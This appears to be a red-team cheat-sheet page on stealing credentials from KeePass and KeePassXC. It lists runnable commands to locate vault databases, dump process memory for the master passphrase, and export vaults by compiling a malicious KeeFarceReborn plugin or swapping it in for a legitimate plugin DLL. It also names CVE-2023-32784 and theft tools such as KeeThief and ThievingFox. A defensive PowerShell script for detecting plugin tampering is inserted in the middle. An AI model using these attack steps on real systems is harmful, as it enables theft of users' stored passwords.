KeePass
Enumerate DB locations:
Cmd > type %APPDATA%\KeePass\KeePass.config.xml | findstr "<Path>"
KeePassXC
PS > [System.Diagnostics.FileVersionInfo]::GetVersionInfo($(Get-Item "C:\Program Files\KeePassXC\KeePassXC.exe")).FileVersion
Extract Passphrase from Memory
Using strings2:
PS > .\strings2.exe -pid (Get-Process KeePassXC).Id -a -wide > KeePassXC_strings.txt
PS > gc .\KeePassXC_strings.txt | Select-String -Pattern "Passw0"
PS > (gc .\KeePassXC_strings.txt).length
PS > (gc .\KeePassXC_strings.txt).length / 1mb
Using Get-ProcessStrings from PowerShellArsenal/MemoryTools:
PS > Get-ProcessStrings -Id 1337 | Out-File KeePassXC_strings.txt
$ dos2unix KeePassXC_strings.txt
$ cat KeePassXC_strings.txt | awk '{print $3}' | grep -x '.\{5,30\}' > words
DLL Hijacking
Extract Passphrase from Memory (< v2.53.1)
CVE-2023-32784
Abusing KeePass Triggers (< v2.54)
Tools
KeeFarce
KeeFarceReborn
Abusing the KeePass Plugin Cache
Export DB by compiling and loading a malicious plugin (requires administrator privileges to place the .plgx file):
Cmd > KeePass.exe --plgx-create C:\KeeFarceReborn\KeeFarceRebornPlugin
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin.plgx "C:\Program Files\KeePass Password Safe 2\Plugins"
Export DB by hijacking a legit plugin DLL (requires an existing plugin that is in use):
Cmd > copy "C:\Program Files\KeePass Password Safe 2\KeePass.exe" .
Cmd > devenv /build Release KeeFarceRebornPlugin.sln
Cmd > copy C:\KeeFarceReborn\KeeFarceRebornPlugin\bin\Release\KeeFarceRebornPlugin.dll C:\Users\snovvcrash\AppData\Local\KeePass\PluginCache\3o7A46QKgc2z6Yz1JH88\LegitPlugin.dll
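A defender-side check for the two plugin locations used above, as an added example that is not part of the original page or of the KeeFarceReborn project: it records the SHA-256 of every .dll and .plgx under the Plugins directory and the per-user PluginCache, then reports files that are new or changed since that baseline. The roots are the default paths from the commands above; the baseline file name and the parameter names are assumptions.

```powershell
# Added example, not from the original page: baseline KeePass plugin files and report drift.
# Roots are the default locations used in the commands above; adjust for other installs.
param(
    [string[]]$Roots = @(
        "$env:ProgramFiles\KeePass Password Safe 2\Plugins",
        "$env:LOCALAPPDATA\KeePass\PluginCache"
    ),
    [string]$BaselinePath = '.\keepass_plugins_baseline.json',  # assumed file name
    [switch]$UpdateBaseline
)

function Get-PluginInventory {
    param([string[]]$Roots)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -File |
            Where-Object { $_.Extension -in '.dll', '.plgx' } |
            ForEach-Object {
                [pscustomobject]@{
                    Path      = $_.FullName
                    SHA256    = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
                    LastWrite = $_.LastWriteTimeUtc.ToString('o')
                }
            }
    }
}

$current = @(Get-PluginInventory -Roots $Roots)

# First run (or -UpdateBaseline): record the known-good state and stop.
if ($UpdateBaseline -or -not (Test-Path -LiteralPath $BaselinePath)) {
    ConvertTo-Json -InputObject $current | Set-Content -LiteralPath $BaselinePath -Encoding UTF8
    Write-Output "Baseline written: $($current.Count) file(s)"
    return
}

# Load the baseline into a path -> hash map (hashtable keys are case-insensitive).
$baseline = @{}
$saved = Get-Content -LiteralPath $BaselinePath -Raw | ConvertFrom-Json
foreach ($entry in $saved) { $baseline[$entry.Path] = $entry.SHA256 }

# Report plugin files that appeared or whose content changed since the baseline.
$findings = foreach ($file in $current) {
    if (-not $baseline.ContainsKey($file.Path)) { $status = 'NEW' }
    elseif ($baseline[$file.Path] -ne $file.SHA256) { $status = 'CHANGED' }
    else { continue }
    [pscustomobject]@{ Finding = $status; Path = $file.Path; SHA256 = $file.SHA256; LastWrite = $file.LastWrite }
}
$findings | Format-Table -AutoSize
```

Run it once on a known-good host to write the baseline, then on a schedule; a legitimate plugin update also shows up as CHANGED and needs a fresh `-UpdateBaseline` run after review.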
KeePassHax
KeeThief
CrackMapExec
KeePwn
ThievingFox